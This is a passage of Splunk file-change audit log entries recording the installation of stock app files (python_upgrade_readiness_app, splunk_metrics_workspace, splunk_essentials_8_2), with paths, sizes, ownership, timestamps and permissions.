user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/pura_sendemail.py", isdir=0, size=17460, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.214, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/pura_send_email.py", isdir=0, size=14181, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.209, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/pura_schedule_scan.py", isdir=0, size=14434, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.204, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/pura_scan_deployment.py", isdir=0, size=10708, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.200, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/pura_scan_apps.py", isdir=0, size=4842, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.196, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/pura_read_progress.py", isdir=0, size=10547, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.192, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/pura_get_all_apps.py", isdir=0, size=11975, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.189, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/pura_export_report.py", isdir=0, size=12370, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.185, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/pura_dismiss_file.py", isdir=0, size=15411, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.181, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/pura_dismiss_app.py", isdir=0, size=10194, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.178, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/pura_cancel_scan.py", isdir=0, size=6472, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.174, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/pura_app_list.py", isdir=0, size=18920, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.170, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.166, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:39.061, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/static/appIcon_2x.png", isdir=0, size=1199, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:39.057, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/static/appIconAlt_2x.png", isdir=0, size=1199, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:39.051, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/static/appIconAlt.png", isdir=0, size=1377, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:39.044, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/static/appIcon.png", isdir=0, size=1377, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.939, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.935, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.930, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.926, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.922, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/appserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.916, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/README.md", isdir=0, size=37, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.912, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/appserver/templates/base-page.html", isdir=0, size=1077, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.907, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/appserver/static/pages/version_check.js.LICENSE.txt", isdir=0, size=1334, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.902, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/appserver/static/pages/version_check.js", isdir=0, size=784479, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.897, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/appserver/static/pages/home.js.LICENSE.txt", isdir=0, size=7087, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.893, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/appserver/static/pages/home.js", isdir=0, size=6539564, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.889, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/appserver/static/pages/constants.js.js", isdir=0, size=90756, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.885, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/appserver/static/pages/analytics_workspace.js.LICENSE.txt", isdir=0, size=10725, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.880, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/appserver/static/pages/analytics_workspace.js", isdir=0, size=8788407, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.875, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/appserver/static/pages/analysis_workspace.js", isdir=0, size=41, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:28 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.768, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/appserver/static/pages", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:28 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.764, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/appserver/templates", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.760, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/appserver/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.757, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/default/data/ui/nav/default.xml", isdir=0, size=73, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.751, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/default/data/ui/views/home.xml", isdir=0, size=152, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.747, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/default/data/ui/views/analytics_workspace.xml", isdir=0, size=157, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.743, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/default/data/ui/views/analysis_workspace.xml", isdir=0, size=128, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.638, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/default/data/ui/views", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.634, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/default/data/ui/nav", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.630, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.627, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/default/workspace.conf", isdir=0, size=122, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.623, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.619, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/default/app.conf", isdir=0, size=486, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:28 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.615, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/metadata/default.meta", isdir=0, size=207, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.611, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/README/workspace.conf.spec", isdir=0, size=1859, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:28 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.608, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/README/workspace.conf.example", isdir=0, size=1901, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:28 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.603, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/static/appIcon_2x.png", isdir=0, size=2036, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.600, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/static/appIcon.png", isdir=0, size=1349, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.495, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/zh_CN/LC_MESSAGES/messages.po", isdir=0, size=118504, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.492, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/zh_CN/LC_MESSAGES/messages.mo", isdir=0, size=29334, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.486, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/zh_CN/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.482, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/ja_JP/LC_MESSAGES/messages.po", isdir=0, size=123847, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.478, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/ja_JP/LC_MESSAGES/messages.mo", isdir=0, size=34677, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.474, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/ja_JP/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.471, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/fr_FR/LC_MESSAGES/messages.po", isdir=0, size=122463, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.466, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/fr_FR/LC_MESSAGES/messages.mo", isdir=0, size=33398, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.461, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/fr_FR/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.457, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/ko_KR/LC_MESSAGES/messages.po", isdir=0, size=121494, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.453, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/ko_KR/LC_MESSAGES/messages.mo", isdir=0, size=32354, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.349, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/ko_KR/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.345, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/de_DE/LC_MESSAGES/messages.po", isdir=0, size=121715, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.341, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/de_DE/LC_MESSAGES/messages.mo", isdir=0, size=32626, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.338, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/de_DE/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.334, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/zh_TW/LC_MESSAGES/messages.po", isdir=0, size=118575, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.330, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/zh_TW/LC_MESSAGES/messages.mo", isdir=0, size=29402, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.326, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/zh_TW/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.323, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/it_IT/LC_MESSAGES/messages.po", isdir=0, size=120951, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.319, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/it_IT/LC_MESSAGES/messages.mo", isdir=0, size=31886, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.316, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/it_IT/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.313, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/zh_TW", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.309, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/zh_CN", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.306, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/ko_KR", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.303, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/ja_JP", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.299, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/it_IT", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.295, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/fr_FR", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.289, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale/de_DE", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.185, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.180, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.176, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/locale", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.172, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.168, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/appserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:27 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.164, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace/README", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Mar 19 23:29:28 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:38.059, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/9_health_rep.png", isdir=0, size=254058, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.055, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/8_dash_studio.png", isdir=0, size=282245, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.050, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/7_dash_studio.png", isdir=0, size=314901, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.046, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/6_dash_studio.png", isdir=0, size=413562, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.040, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/5_dash_studio.png", isdir=0, size=291357, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.036, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/4_dur_search.png", isdir=0, size=284386, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.031, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/3_dur_search.png", isdir=0, size=267893, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.027, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/2_dur_search.png", isdir=0, size=125531, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.023, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/1_fed_search.png", isdir=0, size=137880, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.019, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/18_licensing.png", isdir=0, size=40812, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.015, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/17_licensing.png", isdir=0, size=213428, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.011, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/16_licensing.png", isdir=0, size=146609, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.007, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/15_restrict_age.png", isdir=0, size=128203, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:38.001, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/14_restrict_age.png", isdir=0, size=140394, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.996, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/13_restrict_age.png", isdir=0, size=125321, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.992, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/12_restrict_age.png", isdir=0, size=81321, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.988, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/11_restrict_age.png", isdir=0, size=173282, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.983, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images/10_health_rep.png", isdir=0, size=421043, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.879, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/icons/Splunk_Operator_for_Kubernetes.png", isdir=0, size=30816, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.874, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/icons/Search_Restriction_by_Data_Age.png", isdir=0, size=31324, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.871, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/icons/Scheduler_Observability_and_Performance_Improvements.png", isdir=0, size=22491, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.867, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/icons/Performance_Improvements_for_Searchable_Rolling_Restarts.png", isdir=0, size=28975, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.863, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/icons/New_JSON_Commands.png", isdir=0, size=22364, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.859, user=n/a, 